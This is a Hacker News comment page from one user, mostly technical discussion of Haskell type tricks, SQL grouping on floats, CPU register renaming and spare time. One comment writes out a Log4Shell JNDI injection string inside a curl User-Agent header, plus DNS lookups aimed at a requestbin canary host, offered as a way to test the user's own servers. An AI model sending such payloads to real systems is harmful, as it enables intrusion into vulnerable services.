Hacker News | philh's comments

I don't necessarily disagree. But I do think there's something to be said for knowing that my sql query is "just" slow, not trapped in an infinite loop. Not confident, but I feel like debugging "why is this query so slow that it hasn't returned yet" seems easier than debugging "why has this slow-or-maybe-nonterminating query not returned yet".


Yeah, if your table sources are small enough it will probably be fast enough to analyze anyway.


I think my position is:

Native heterogeneous lists will often be convenient, and sometimes when you've used them they're going to turn out in retrospect to have been a bad idea but sometimes they'll be just fine, especially if they stay fairly locally scoped. I haven't done any serious work in a language that supports them for years, so I don't have a strong opinion about how often each of those cases happens.

But if you decide you want heterogeneous lists, but your language doesn't support them, so you try to implement that with a sum type, then that's basically always going to be a massive pain.


What's an example use case where heterogeneous lists turn out to be fine but can't be modelled with eg the OCaml difflist technique, eg https://github.com/yawaramin/re-web/blob/0d6c62fb432f85cc437... ?


I'm not familiar with that technique and don't know what's going on from that snippet.

In Haskell, any time a heterogeneous list turns out to be fine, I expect to be able to model it. Often it'll look like "I'm applying a polymorphic function to every one of these list elements", and then you can either do a sum type (as discussed in the post) or an existential (which doesn't need you to list up front all the types you might use). If the function is "is negative?", it'll look something like (untested)

    {-# LANGUAGE ExistentialQuantification #-}

    data SomeNum = forall a. (Num a, Ord a) => SomeNum a

    isNegative :: SomeNum -> Bool
    isNegative (SomeNum n) = n < 0

    numbers = [SomeNum (3 :: Int), SomeNum (5.2 :: Double), SomeNum valOfUnexpectedNumericType]
    anyNegative = any isNegative numbers
...but it'll often be easier to just apply the `< 0` check to every element before putting them in the list. (If you have several functions you want to apply to them all, that's when the existential trick becomes more useful.)

So you can model heterogeneous lists in this case, and it's safer (because you can't put in a value that can't be compared to 0) but also less convenient. Whether that's an improvement or not will depend on the situation.


I also just learned about it. I found this explanation of what it is: https://drup.github.io/2016/08/02/difflists/

It's a slightly confusing name, though; it makes me think of a difference list, which seems to be a completely unrelated data structure (basically a rope).

http://h2.jaguarpaw.co.uk/posts/demystifying-dlist/


Thanks. Yeah, I don't understand the name.

You could construct a basically-equivalent data structure in Haskell, but I think normally you'd use an HList (defined in many places but e.g. https://hackage.haskell.org/package/HList-0.5.2.0/docs/Data-...). I've only occasionally had use for them myself, at any rate I don't think they're convenient for the "apply a function to all these elements" case.


In the technique I showed, I am using a difflist to enumerate a set of HTTP POST form fields and their expected types. This difflist type is defined in such a way that one of its type parameters gets inferred as a function type which takes the decoded values in the correct order and returns a record containing the decoded form. Eg from Field.[int "id"; string "name"] we get a type parameter int -> string -> 'a, where 'a is the type of the final decoded form.

This is the kind of real-world usage where difflists or heterogeneous lists shine. The same technique is used by this library to define type-safe GraphQL resolvers: https://github.com/andreas/ocaml-graphql-server


> I haven't done any serious work in a language that supports them for years

Is this not silently admitting that strong types to some degree have won?

Don't get me wrong: I like Clojure/LISPs/Ruby. But I would not choose them for a new project these days.

(and I do not like JS, which has them too)


I'm still working at the same company as when I wrote this, and that company is still using Haskell (now mostly Typescript instead of Elm). If I did move on I'd ideally want to keep using Haskell, or failing that some other strongly typed language.

But I don't expect that my own experience says much about the language ecosystem in general. I don't particularly have an opinion on whether or not strong types have "won", and I didn't intend to comment on that question.


I would definitely choose a Lisp if it had an Intellij-like IDE. Especially since the type system of CL is good, though not static, obviously. But it's a tradeoff between having Haskell during compile time and CL during development time, for me.


For whatever it's worth, when I first wrote this I submitted it to /r/haskell (https://www.reddit.com/r/haskell/comments/cs7jyu/a_reckless_...) and it doesn't look like there were any corrections from that; and since then I've implemented an HM type checker and don't remember finding anything that made me think "oh, I was wrong about ...".

So I'm more confident in the essay than I was at the time. But yeah, getting put on guard by those caveats doesn't seem ideal for intro material. (But if I hadn't had them and I'd gotten something wrong, that would also not have been ideal...)

For writing the type checker, "write you a haskell" that someone else linked was really helpful, and so was a paper called "typing haskell in haskell": https://web.cecs.pdx.edu/~mpj/thih/thih.pdf


SQL queries sometimes put floats in GROUP BY. E.g. if you have a many-to-one relationship you might do a query like

    SELECT foo_id, foo.some_float, SUM(bar.some_thing)
    FROM foo JOIN bar USING (foo_id)
    GROUP BY foo_id, foo.some_float
I feel kinda dirty whenever I do this.

Though, I would guess the optimizer (at least in postgres) is smart enough to ensure no float equality checks actually happen under-the-hood. They could be necessary, if the schema was different than I'm imagining; but maybe in that case, it would almost always be a bad idea.
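For what it's worth, the pattern (and a float-free equivalent that groups on the key alone and carries the float through an aggregate) can be sketched with SQLite via Python's stdlib; the schema and values here are made up:

```python
import sqlite3

# Hypothetical schema mirroring the example: many bar rows per foo.
con = sqlite3.connect(":memory:")
con.executescript("""
    CREATE TABLE foo (foo_id INTEGER PRIMARY KEY, some_float REAL);
    CREATE TABLE bar (foo_id INTEGER, some_thing INTEGER);
    INSERT INTO foo VALUES (1, 0.1), (2, 2.5);
    INSERT INTO bar VALUES (1, 10), (1, 20), (2, 5);
""")

# The pattern from the comment: the float rides along in the GROUP BY.
grouped = con.execute("""
    SELECT foo_id, foo.some_float, SUM(bar.some_thing)
    FROM foo JOIN bar USING (foo_id)
    GROUP BY foo_id, foo.some_float
""").fetchall()

# Same result, but no float ever enters the grouping key: group by the
# primary key only and carry the float through an aggregate.
aggregated = con.execute("""
    SELECT foo_id, MAX(foo.some_float), SUM(bar.some_thing)
    FROM foo JOIN bar USING (foo_id)
    GROUP BY foo_id
""").fetchall()

print(sorted(grouped))     # [(1, 0.1, 30), (2, 2.5, 5)]
print(sorted(aggregated))  # [(1, 0.1, 30), (2, 2.5, 5)]
```

Whether the MAX() version is clearer is debatable; it just makes explicit that the float is functionally determined by the key rather than part of it.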


Why would you feel dirty? In this case it is solving for exact equality, ie the same bits, it doesn't matter that the value is a float.

Though I have seen some people using a double as a primary key (no idea why) and some database engine (internal, not major vendor) failing to do equality comparisons in certain statements, I suspect because they must be switching to "close enough" which is not what you expect when you write col1 = col2.


This is also really kind of an artifact of how GROUP BY works in most database engines.

I've always liked the way MySQL/MariaDB let you omit things from the GROUP BY if they're provably unique in each group (here, if foo_id is a primary key of foo, and you're grouping by it, there can only ever be one foo.some_float for each foo_id).

I suspect in practice this would get rid of approximately all occurrences of group-by-float.
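For what it's worth, SQLite also permits bare columns alongside GROUP BY (it takes the value from an arbitrary row in the group, which is unambiguous here since foo_id determines some_float). A sketch with a made-up schema:

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.executescript("""
    CREATE TABLE foo (foo_id INTEGER PRIMARY KEY, some_float REAL);
    CREATE TABLE bar (foo_id INTEGER, some_thing INTEGER);
    INSERT INTO foo VALUES (1, 0.1), (2, 2.5);
    INSERT INTO bar VALUES (1, 10), (1, 20), (2, 5);
""")

# some_float is selected but not grouped on: no float ever enters the
# grouping key, yet each group has exactly one value for it.
rows = con.execute("""
    SELECT foo_id, foo.some_float, SUM(bar.some_thing)
    FROM foo JOIN bar USING (foo_id)
    GROUP BY foo_id
""").fetchall()
print(sorted(rows))  # [(1, 0.1, 30), (2, 2.5, 5)]
```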


Huh, I remember xearth. It would move the stars every time it redrew itself. I wanted to have it update every second for some reason, and that was distracting, so I patched it to add an option to not do that. Then I couldn't find a maintainer to send it to, so I didn't share it.


I set up xearth to approximate the view from the ISS, at the appropriate orbital velocity. But with a decent refresh rate, what a CPU hog it was.


I don't really know what's going on here, so to clarify... it gives "simple checking example"

    nslookup mydatahere.a54c4d391bad1b48ebc3.d.requestbin.net
but when I run that in my terminal I get the response

    ;; Got SERVFAIL reply from 83.146.21.6, trying next server
    Server:  212.158.248.6
    Address: 212.158.248.6#53

    ** server can't find mydatahere.a54c4d391bad1b48ebc3.d.requestbin.net: SERVFAIL
And nothing shows up in "received data" on the website.

Is that expected? Should I be running the dnsbinclient.py they provide? (I don't have the websocket module installed right now.) I did run `curl a54c4d391bad1b48ebc3.d.requestbin.net` before the nslookup, could that have made a difference here?


I'm not Requestbin's creator so I don't know. A simple nslookup or curl does work for me, with my system's DNS servers set to Cloudflare (1.1.1.1) or Google (8.8.8.8).

It looks like Vodafone (I assume this is your ISP) DNS servers aren't properly resolving the name for some reason. You could try bypassing it with dig, and directly ask a different DNS server to resolve it:

  dig @1.1.1.1 A whatever.a54c4d391bad1b48ebc3.d.requestbin.net


Thanks! Yeah, `dig` with no DNS gives me a SERVFAIL but `dig @1.1.1.1` works.

My ISP isn't Vodafone directly (I take it you think that because 83.146.21.6 belongs to them?) but might be a Vodafone reseller or something.


Yeah, I assumed since you were querying their DNS that you were a client, but makes sense it might be repackaged to other ISPs.


Like, my understanding from reading the thread was that I'd be able to run this and make requests to my servers setting my User-Agent, like

    curl -A '${jndi:ldap:test.a54c4d391bad1b48ebc3.d.requestbin.net/abc}' https://my-service.net
and if they're vulnerable (at least through logging user-agents, I know there are other possible avenues) something would show up on the website. Is it more complicated than that?


The context was parsing, not semantics. "Typeless" meant "lacking type annotations", not directly to do with static/dynamic or weak/strong typing.

(Though Python does have optional type annotations these days.)


Author in the old thread (https://news.ycombinator.com/item?id=19262249) says

> An x86-64 CPU has sixteen integer registers, but 100-200 physical integer registers. Every time an instruction writes to, say, RAX the renamer chooses an available physical register and does the write to it, recording the fact that RAX is now physical-register #137. This allows the breaking of dependency chains, thus allowing execution parallelism.

I'm curious why they have so many more physical registers than... logical? registers. I have a couple of guesses:

* Physical registers are physically cheaper to add than logical registers.

* Adding logical registers breaks backwards compatibility, or at best means you get no speedup on things written (/compiled) for fewer logical registers. Adding physical registers lets you improve performance without recompiling.

* Adding logical registers increases complexity for people writing assembly and/or compilers. Adding physical registers moves that complexity to people designing CPUs.

Are some of these correct? Other reasons I'm missing?


Don't think of %eax as a real register. Think of it as a tag in a compressed dataflow graph. The compression is performed by the compiler's register allocator, and the decompression is performed by the CPU's register renaming.

A compiler's IR is a directed graph, where nodes are instructions and tagged by an assigned register. It would be pleasant to assign each node a distinct register, but then machine instructions would be unacceptably large. So the compiler's register allocator compresses the graph, by finding nodes that do not interfere and assigning them the same register.

The CPU's register renamer then reinflates this graph, by inspecting the dataflow between instructions. If two instructions share a register tag, but the second instruction has no dependence on the first, then they may be assigned different physical registers.

`xor eax, eax` has no dependence on any instruction, so it can be specially recognized as allocating a new physical register. In this way of thinking, `xor eax, eax` doesn't zero anything, but is like malloc: it produces a fresh place to read/write, that doesn't alias anything else.


Adding more logical registers is compatibility breaking. And, since you have to encode the register specifier in the instruction it means larger instructions (hence the compatibility breaking) which makes reading and decoding instructions slower.

And, regardless of how many logical registers you have you need to have more physical registers. These are needed for out-of-order (OOO) execution and speculative execution. An OOO super-scalar speculative CPU can have hundreds of instructions in flight and these instructions all need physical registers to work on. If you don't have excess physical registers you can't do OOO or speculative execution.


Adding more logical registers doesn't have to break application compatibility. Intel added x87, MMX ... extensions with their new register sets all without breaking compatibility. They even doubled the integer register set in x86_64 with the REX prefix. New programs could use these features and their register sets without existing programs being broken.

What register renaming allows is to increase the performance of both new and existing programs, which is no mean feat. It allows the CPU scheduler to search for more out-of-order parallelism rather than relying on the compiler to find in-order parallelism.

This binary compatibility doesn't seem very important now ("don't break userspace" excepted), but it was then. Compatibility made IBM and Intel hundreds of billions of dollars.


Adding those registers each time at the bare minimum broke OS compatibility in order to enable them, and required kernel changes to save and restore the new architectural registers. Adding to the physical register file allows existing code (including kernel space) to take advantage of it. There's been some extensions lately like xsave that try to address that, but they're not fully embraced by major kernels AFAIK.


Tomasulo's register renaming algorithm (1967) comes from an era when you bought the computer and the operating system together. So OS compatibility was their problem. That's not our era but the resulting in-order vs out-of-order war is long over.

Register renaming enabled out-of-order execution. The 90s were a competition between in-order compiler based scheduling and out-of-order CPUs. The in-order proponents said that out-of-order was too power hungry, too complex and wouldn't scale. Well, it did. Even the Itanium which was the great in-order hope, its last microarchitecture, Poulson, had out-of-order execution.

Ultimately, out-of-order won the war but in-order survives for low power low complexity designs; the A53 is in-order. Skylake Server has 180 physical registers with an out-of-order search window of 224.

https://www.primeline-solutions.com/media/wysiwyg/news-press...


In the 1960s, os compat was your problem as the end user too. There wasn't the strict divide between OS code and user code in the same way. The 360/91 that Tomasulo's algorithm originally shipped on didn't even have an MMU to separate your code from the kernel.

Additionally, compiler tech wasn't anywhere near where it is today, and high perf code was written in ASM. Therefore existing code would have to be rewritten to use more registers, but the 360/91 ran existing code just fine (which was very important for the 360/91's main customers).


x87 and MMX's register encodings exist in (mostly) separate parts of the x86 operand encoding map. That's in contrast to GPRs, which have to squeeze into 3 (sometimes 4, with the REX prefix) bits.

That's where the incompatibility comes from -- x86-64 required an entirely new prefix to merely double the GPRs; adding a few hundred more would require some very substantial changes to the opcode map and all decoders already out there.


When x87+MMX were added, existing programs ran unchanged. When x86-64 doubled the register sets, many existing programs ran unchanged (some features were dropped). Compatibility was largely maintained. That compatibility was what AMD wagged in Intel's face when Intel was trying to pivot to Itanium. Intel had to then take the walk of shame and adopt AMD's approach.

Seriously, Intel took a long view towards this. x87 was a wart on the side of a mole, and still its unholy marriage with MMX (they shared a register set) allowed existing programs to run while creating a compatibility barrier to competitors. Competitors had to be compatible and bug compatible. The guy tasked with doing this at Transmeta almost had a nervous breakdown, not from compatibility (easy) but from bug compatibility.

IBM 360 programs still run on the Z architecture.


The original 8087 prompted the IEEE 754 floating point standard, which had a profound impact on the entire field of computer science.

https://news.ycombinator.com/item?id=17767925

https://news.ycombinator.com/item?id=23205225

https://news.ycombinator.com/item?id=23362673

https://news.ycombinator.com/item?id=18107165


I'm not saying it's impossible! They certainly have plenty of space in the EVEX scheme. But extending the GPRs is a much bigger lift, tooling-wise, than is adding a relatively disjoint ISA extension. Even if they can do it while preserving older encodings, it's just another speedbump at a time when Intel is probably anxious to make x86-64 as frictionless as possible.

Besides, register renaming seems to be working splendidly at the uarch level. Why complicate the architectural model when the gains are already present?


> Even if they can do it while preserving older encodings, it's just another speedbump at a time when Intel is probably anxious to make x86-64 as frictionless as possible.

Just wanted to throw out there that it was AMD that came up with x86-64's ISA rather than Intel. Intel was still pushing Itanium hard at the time.


x87 instructions weren't dropped, they are still available on x86_64.


Yeah, you're right; the manual lists them as valid in 64-bit mode. Thanks.


> I'm curious why they have so many more physical registers than... logical? registers

Register renaming allows instructions to be executed out-of-order [1] which allows for more instruction throughput.

This goes back to 1967 and to the IBM 360/91 with its 4 floating point registers. That's not many registers but Moore's law was making more transistors available. The problem was how to use these transistors to get more throughput from existing programs without changing the ISA and (potentially) breaking compatibility.

The solution was Tomasulo's algorithm [2] which allowed (few) architectural registers to be renamed to (many) physical registers.

  original         renamed           reordered
  mov RAX, 1       mov PHYS1, 1      mov PHYS1, 1; mov RAX, [RCX]
  add RBX, RAX     add RBX, PHYS1    add RBX, PHYS1
  mov RAX, [RCX]   mov RAX, [RCX]
The first and third instructions can be executed at the same time on independent functional units. The third is out-of-order with respect to the second.
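The renaming in the table above can be sketched with a toy register alias table; the (dest, [sources]) instruction format and the PHYSn names are simplified for illustration:

```python
# Toy register renamer: every architectural write allocates a fresh
# physical register, which is what breaks the false dependency between
# the two writes to RAX.

def rename(instrs):
    rat = {}      # register alias table: architectural reg -> physical reg
    counter = 0
    out = []
    for dest, srcs in instrs:
        # Reads go to whichever physical register currently holds the
        # value; registers never yet written keep their architectural name.
        srcs = [rat.get(s, s) for s in srcs]
        counter += 1
        rat[dest] = f"PHYS{counter}"
        out.append((rat[dest], srcs))
    return out

program = [
    ("RAX", []),        # mov RAX, 1
    ("RBX", ["RAX"]),   # add RBX, RAX   (RBX's own read elided for brevity)
    ("RAX", ["RCX"]),   # mov RAX, [RCX]
]
print(rename(program))
# [('PHYS1', []), ('PHYS2', ['PHYS1']), ('PHYS3', ['RCX'])]
```

The third instruction writes PHYS3, not PHYS1, so it needn't wait for the add to finish, matching the "reordered" column.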

[1] https://inst.eecs.berkeley.edu/~cs152/sp20/lectures/L10-Comp...

[2] https://en.wikipedia.org/wiki/Tomasulo_algorithm


I've not seen this in other responses, but an answer to your question is that every logical register adds overhead to context switching by the operating system.

The OS has to store and load all registers whenever it decides to switch which thread is processing. 100 more logical registers means 100 more locations the OS has to keep track of.

This is part of the reason why new SIMD instruction sets need OS support before you can start using them.


> Adding logical registers breaks backwards compatibility

This, plus adding logical registers increases instruction size and therefore decreases the number of instructions that can be fetched with a given memory bandwidth.


It can definitely be beneficial to add logical registers. When AMD designed x86-64 they doubled the number of general logical registers up to 16. As other commenters have said, unless you are already making breaking changes, increasing the number of logical registers is probably not worth it.


Having more physical registers than logical means the CPU can do optimizations, opcodes don't have to be as big (it takes more bits to encode more registers), compatibility with older binary code is maintained, and CPUs at different price points can have different numbers of physical registers while all being able to run the same binaries.

(I don't know if any manufacturer actually does that last thing, however.)


> * Adding logical registers breaks backwards compatibility, or at best means you get no speedup on things written (/compiled) for fewer logical registers. Adding physical registers lets you improve performance without recompiling.

> * Adding logical registers increases complexity for people writing assembly and/or compilers. Adding physical registers moves that complexity to people designing CPUs.

These two points are the same thing: compatibility, and compatibility is what Intel and AMD have lived on from day one with x86. It's why we still live with this really weird instruction set with all of its historical oddities. Certain features of real mode weren't removed until long into the 64-bit era. Adding things isn't any better: if you wanted to add more registers, you'd have to change instruction encoding, and the instruction space is finite (actually limited to 15 bytes.) That would be rather disruptive.


I think your second point hits it and is the primary benefit to hiding the microarchitecture layer - it can be improved and existing code will benefit from it.

Basically Intel is saying if you had 200 GPRs, you couldn't do better at using the free ones than the CPU scheduler/decoder.

> Adding *architecturally visible* registers increases complexity for people writing assembly and/or compilers.

More registers just makes your code less likely to have to shuffle stuff to and back from RAM - which is where stuff will go if you don't have registers.

It's always faster for a CPU to access registers within itself than have to talk over a bus to a memory. Even when RAM was the same speed as CPUs (8-bit era) you would still save a cycle or two.


Having more logical/architectural registers is great except for a few costs:

1) More bits to encode register numbers in instructions. Doubling the number of logical registers costs another two or three bits depending on how many registers are referenced in an instruction

2) Logical registers have to be saved on context switches

3) Logical registers have to be saved around function calls. Either the caller or the callee has to save (or not use) registers, and most functions are both callers and callees. That is, if you are not a leaf-node function then every register you use you have to first save to the stack, or else assume that the functions you call will trash it. Thus, more registers have diminishing returns.

4) No matter how many logical registers you have you _always_ want to have an order of magnitude more physical registers, because otherwise you can't implement OOO or speculative execution.

Point #4 is probably the most critical because I think what people are really asking is why are there more physical than logical registers, and OOO/speculative execution is the answer.


I wonder how things like register renaming (or pipelining) are implemented. It would seem difficult even in a high level language, but they do it inside the processor. Is this in microcode that runs on the "actual" processor? Or is it in hardware? Do they write the algorithm in a language like VHDL or Verilog?


Register renaming is implemented in hardware. Because it is used on every instruction it is on the critical path and is probably hand-optimized. Here is some more reading on this topic:

https://en.wikipedia.org/wiki/Register_renaming


Renaming isn't really done in microcode. Microcode is just another source for ops that get renamed. All of the renaming happens in hardware, and boils down to a handful of tables inside the processor.


Some cores are open source and you can see for yourself.

Rename logic from BOOM, a RISC-V core written in a DSL embedded in Scala:

https://github.com/riscv-boom/riscv-boom/blob/1ef2bc6f6c98e5...

From RSD, a core designed for FPGAs written in SystemVerilog:

https://github.com/rsd-devel/rsd/blob/master/Processor/Src/R...

And then there's Alibaba's recently open-sourced XuanTie C910, which contains this Verilog… which is completely unreadable. Seems like it was produced by some kind of code generator that they didn't open-source?

https://github.com/T-head-Semi/openc910/blob/d4a3b947ec9bb8f...


All of the above, I believe.


Beyond the reasons & limitations explained in sibling posts, having a large number of (logical / instruction-level) registers also inflates instruction size, and thus diminishes instruction density, and thus lowers performance - so there is a trade-off between instruction density and register count. Hear me out.

The CPU has limited memory bandwidth; the larger the instruction size, the more bytes need to be loaded from memory to execute the instruction. Same with cache size - the more space an instruction takes, the fewer instructions fit in the cache. Lastly, there's the complexity & latency of the instruction decoder. This possible performance loss is averted by keeping instructions short and the instruction set "dense".

Any instruction that refers to a register needs a certain number of bits in the operand portion to indicate which specific register(s) is to be used [1][2][3]. As an example, in the case of 8-register x86 the operand generally uses 3 bits just to indicate which register to use. In the case of 16-register x86_64, it takes 4 bits. If we wanted to use all 200 physical registers, that would require a whole 8 bits reserved in the instruction just to indicate the register to use. Certain instructions - data transfer, algebra & bitwise operations, comparisons, etc. - naturally use two or more registers, so multiply that accordingly.
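The arithmetic above can be checked directly (a quick sketch; register counts as in the paragraph):

```python
import math

# How many operand bits it takes to name one of n registers.
def reg_bits(n):
    return math.ceil(math.log2(n))

print(reg_bits(8))    # 3 bits: classic 8-register x86
print(reg_bits(16))   # 4 bits: 16-register x86_64
print(reg_bits(200))  # 8 bits: if ~200 physical registers were all visible
```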

Since using this many registers gives only diminishing returns in terms of performance (and also requires very heavy lifting on the compiler's part[4]), the trade-off selected is that the compiler uses an architecture-defined small number of registers, and the processor at runtime is able to speed up some code using the spare registers for instruction-level execution parallelism.

[Edit]

There's one more common circumstance where a large number of registers is undesirable: a change of execution context (thread switch; process switch; interrupt). Typically all architecturally-visible registers are saved to memory on a change of context and a new set is loaded for the new context. The more registers there are, the more work is to be done. Since the hardware registers are managed directly by the CPU and serve more as a cache than as directly accessed registers, they don't need to be stored to memory.

[1] Aside of certain specialized instructions that implicitly use a particular register; for example in x86 many instructions implicitly use the FLAGS register; DIV/IDIV integer division implicitly uses AX and DX registers.

[2] Aside of certain instruction prefixes that influence which register is used; for example in x86 that would be segment register overrides.

[3] Aside of certain architectures where registers were organized in a "file" and available only through a "window" - i.e., an implicit context, implicit register addressing base; instruction operands referred to registers relative to the current window, and the whole window could be shifted by specialized instructions. Typically shifted on function enter/leave and similar. This was more-or-less the whole "hardware registers" being exposed at architecture level, however in a somewhat constrained / instruction-dense way.

[4] Arranging which registers to use, which to spill to memory etc. is non-trivial work for compiler, and the complexity grows super-linearly with the number of registers.


the ISA defines logical registers

the implementation defines physical registers

any implementation is permissible as long as it conforms to the ISA


This doesn't acknowledge weekends, which if you have the same 8 hours sleep and 4 hours "not for yourself", add more than 50% to the time you supposedly have "for yourself". (4×5 + 12×2 vs 4×7.)

Which doesn't necessarily change the point, but I'm not sure what if anything the point is supposed to be, and it seems an important omission.


Don't usually have much extra time on the weekends. Weekends are for making up for a week of the house getting dirty, relatives and friends wanting to meet, extra long walks for the dogs that only got short walks during the week, errands that got put off, some catchup sleep, actually relaxing a bit since there wasn't much during the week, etc.

I might have 2-3 hours each day (of energy and motivation) to work on projects but not 8. Of course I never have 4 hours during the week either, I'm lucky to get 1 in usually.


> relatives and friends wanting to meet

which is why some people who have the discipline and self-control to do a big personal project often have to neglect friends and family - it's a sacrifice.


Sure. I'm not saying I haven't made sacrifices for personal projects before, especially when I was younger, but I'm also not willing to become a total hermit and slave for these projects that are not really going anywhere.

Hell, I'm still waiting on my first board game signed by a publisher four years ago to be manufactured and released, and it sounds like it's still on the backburner at their company (they had a rough two years from the pandemic, I get it). And I've had another game be a finalist in two game design competitions since then and still not find a publisher willing to take a chance on it (several other finalists in the same competitions have). And I've pitched at least a dozen of my other designs to quite a few publishers as well.

Still churning and pitching but after seven years of trying and not getting anywhere, it's rough. I know if I went full time I'd have a lot more success (especially seeing how much success a friend of mine is having in only about 3 years of being full-time at it), but I'm not willing to start working for 30% of my current salary or possibly a lot less just to throw a few more board games into the field that's already supersaturated from the past decade of constant new and quality releases, especially when most publishers are facing an existential threat from the current shipping crisis.

I'm also working on a couple of smaller video games, but there are weeks where it just seems like I'm too busy or tired to spend time on it. And it's hard to go "yes, let's make the sacrifice of not seeing friends and ignoring my family" when I'm really not seeing how I'm going to break through the flood of video games out there either. I'm not an artist, I'm not going to make the next Stardew Valley or Undertale by myself. I'm making games with hexes and arrows in them :) Fun games, and one of them was even a popular free flash game back in the day and also won awards, but most people have probably moved on now and the new generation won't have any nostalgia for it.

Still feel like I need to make it anyway though.


You're not alone. Unless I actively maintain my apartment it'll deteriorate over the week (I even meal prep on weekends to alleviate some of it). I do agree with others though: more time spent disengaging from the work you're doing may actually net you a positive in the productivity dept.


Weekends aren't necessarily free time.

Saturdays and Sundays are chore days, or family days, or simply resting, or ...

About 4h remaining for yourself is still fairly realistic.


I assume that for most people the "not for yourself" time is bigger on the weekends, it is for me and the people around me.


Indeed. In my case, ever since I became a parent, I consider weekends a total write-off.


What do you mean by "that's really on you"? I'd normally interpret it as something like... "this is a state of affairs that would be different if you'd acted differently, and you knew or could have been able to know this in advance". Along those lines, anyway. But not having heard about a tool doesn't really seem to fit that.


>What do you mean by "that's really on you"?

At some point, a tool is so ubiquitous that it's just odd to not have encountered it. You don't see many accountants that haven't heard of Excel, webdevs that haven't heard of Apache, construction workers that haven't heard of a hammer, or cybersec workers who haven't heard of L0phtCrack.


It means it's their fault because they clearly were not paying attention or their memory has failed them.

L0phtCrack has been decreasingly relevant in the past 10 years or so -- it wasn't available for a while and some free tools are similar so you were basically buying the rainbow tables -- but if you were in security in the Windows 2000 or Windows XP era, you know of this tool. There was a lot of discussion for years around and about password crackers after rainbow tables became a thing.

It's not like not knowing what Wireshark or nmap is, but it is like saying that you've never even heard of Kismet or John the Ripper. Or like being a DBA for decades that never heard of Informix. Or a programmer for "decades" that has never even heard of Delphi. Like what were you doing in the early 2000s to have completely missed the death of Borland and Pascal and the popular variants? These are big enough events in the industry that if you're in it you're going to be aware of it.

